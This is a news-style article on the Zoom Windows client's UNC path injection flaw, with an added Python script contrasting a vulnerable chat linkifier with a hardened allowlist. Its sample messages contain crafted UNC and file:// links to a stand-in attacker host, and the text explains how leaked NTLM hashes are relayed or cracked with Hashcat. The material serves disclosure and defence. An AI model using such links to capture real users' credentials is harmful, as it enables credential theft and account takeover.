The Windows client of the video chat app Zoom, whose use has surged recently, reportedly has a critical vulnerability that could allow attackers to steal users' Windows login credentials. According to security researchers Matthew Hickey (@HackerFantastic) and Mitch (@_g0dmode0), the client's chat feature is vulnerable to UNC path injection, enabling an attacker to capture a user's NTLM credentials (the Windows username and NTLM challenge-response hash) every time that user clicks a crafted link inside a chat message.
Hi @zoom_us & @NCSC – here is an example of exploiting the Zoom Windows client using UNC path injection to expose credentials for use in SMBRelay attacks. The screen shot below shows an example UNC path link and the credentials being exposed (redacted). pic.twitter.com/gjWXas7TMO
— Hacker Fantastic (@hackerfantastic) March 31, 2020
As reported by Bleeping Computer, the vulnerability stems from the fact that Zoom automatically converts URLs sent in chat messages into clickable hyperlinks, but does not distinguish genuine web URLs from Windows networking UNC paths (of the form \\server\share\file), so those are turned into hyperlinks as well. If a user clicks a UNC path link, Windows tries to open the path over SMB and, as part of NTLM authentication, sends the user's login name and NTLM challenge-response hash (the Net-NTLMv2 response, not the raw password) to the attacker-controlled server, where it can be captured for offline cracking or relayed to another host.
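To make the flaw concrete, the following Python script is an added, illustrative re-implementation of a chat linkifier; it is not Zoom's code (the client is closed source) and the hosts, file names and chat messages in it are constructed. It renders each message under a vulnerable policy (every link-like token becomes a hyperlink, UNC paths included) and under a hardened policy that only links absolute http(s) URLs. It goes slightly beyond the report by also covering the file:// and \\?\UNC\ spellings of a network path, and `smb_target()` shows which host Windows would authenticate to for a given link, which is the value a defender would extract from chat logs to block or hunt on.

```python
"""Added example: UNC-path linkification flaw and a hardened linkifier.

Not Zoom's code. All messages and hosts below are constructed.
"""
import re
from html import escape, unescape
from urllib.parse import urlsplit

# A permissive "anything link-like" matcher of the kind a chat client might
# use: scheme:rest, or a UNC path starting with two backslashes.
# (?<!\S) anchors each match at a token boundary.
LINK_RE = re.compile(r"(?<!\S)(?:[a-z][a-z0-9+.\-]*:\S+|\\\\\S+)", re.IGNORECASE)

# Constructed sample chat messages (hypothetical hosts, not from the report).
MESSAGES = [
    "meeting notes: https://example.com/notes?id=1",
    r"deck: \\attacker.example\share\deck.pptx",
    "same thing as a URI: file://attacker.example/share/deck.pptx",
    r"long form: \\?\UNC\attacker.example\share\deck.pptx",
]


def allow_anything(token: str) -> bool:
    """Vulnerable policy: every matched token becomes a hyperlink."""
    return True


def allow_http_only(token: str) -> bool:
    """Hardened policy: only absolute http(s) URLs with a host become links.

    Tokens starting with two backslashes or two slashes (UNC spellings,
    including the long ?\\UNC form) and the file: scheme are rejected,
    because Windows would open them over SMB and NTLM-authenticate to the host.
    """
    if token.startswith(("\\\\", "//")):
        return False
    parts = urlsplit(token)
    return parts.scheme.lower() in {"http", "https"} and bool(parts.netloc)


def linkify(text: str, allow) -> str:
    """Render a chat message as HTML, turning allowed tokens into <a> links."""
    out, pos = [], 0
    for m in LINK_RE.finditer(text):
        out.append(escape(text[pos:m.start()]))
        tok = m.group(0)
        if allow(tok):
            out.append(f'<a href="{escape(tok, quote=True)}">{escape(tok)}</a>')
        else:
            out.append(escape(tok))
        pos = m.end()
    out.append(escape(text[pos:]))
    return "".join(out)


def hrefs(html: str) -> list:
    """Extract the link targets a client would navigate to on click."""
    return [unescape(h) for h in re.findall(r'href="([^"]*)"', html)]


def smb_target(token: str):
    """Host Windows would open an SMB session (and send NTLM auth) to, or None."""
    if token.startswith("\\\\"):
        rest = token[2:]
        if rest.upper().startswith("?\\UNC\\"):   # \\?\UNC\host\share long form
            rest = rest[6:]
        return rest.split("\\", 1)[0] or None
    parts = urlsplit(token)
    if parts.scheme.lower() == "file" and parts.netloc:   # file://host/share
        return parts.netloc
    return None


if __name__ == "__main__":
    for msg in MESSAGES:
        for name, policy in (("vulnerable", allow_anything), ("hardened", allow_http_only)):
            links = hrefs(linkify(msg, policy))
            hosts = [t for t in (smb_target(h) for h in links) if t]
            print(f"{name:10} links={links} -> SMB auth to {hosts}")
```

The hardened policy is an allowlist, not a blocklist: rather than trying to enumerate every UNC spelling Windows accepts, it links only what is provably a web URL, which is the shape of fix Hickey asked for.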
The researchers also released a proof-of-concept demo that shows not only how the captured hashes are sent to a third-party server, but also how they can be cracked offline with free tools such as Hashcat to recover the plaintext password, potentially jeopardizing millions of users. As if that weren't bad enough, Hickey also claims that the same technique can be used to launch programs on the victim's computer, by pointing a UNC link at an executable rather than at a document.
The problem remained unresolved as of Tuesday, but Hickey says that Zoom can easily mitigate it by no longer converting UNC paths into clickable hyperlinks. "Zoom should not render UNC paths as hyperlinks is the fix, I have notified Zoom as I disclosed it on Twitter," he told Bleeping Computer. Zoom has yet to release a fix, but there are a couple of manual workarounds on the Windows side: set the Group Policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to "Deny all", or set the equivalent registry value RestrictSendingNTLMTraffic to 2 (DWORD) under HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0. Both stop Windows from sending NTLM credentials to remote servers, but note that they also block legitimate NTLM authentication to hosts that depend on it, so test before rolling out. You can check the step-by-step instructions on Bleeping Computer.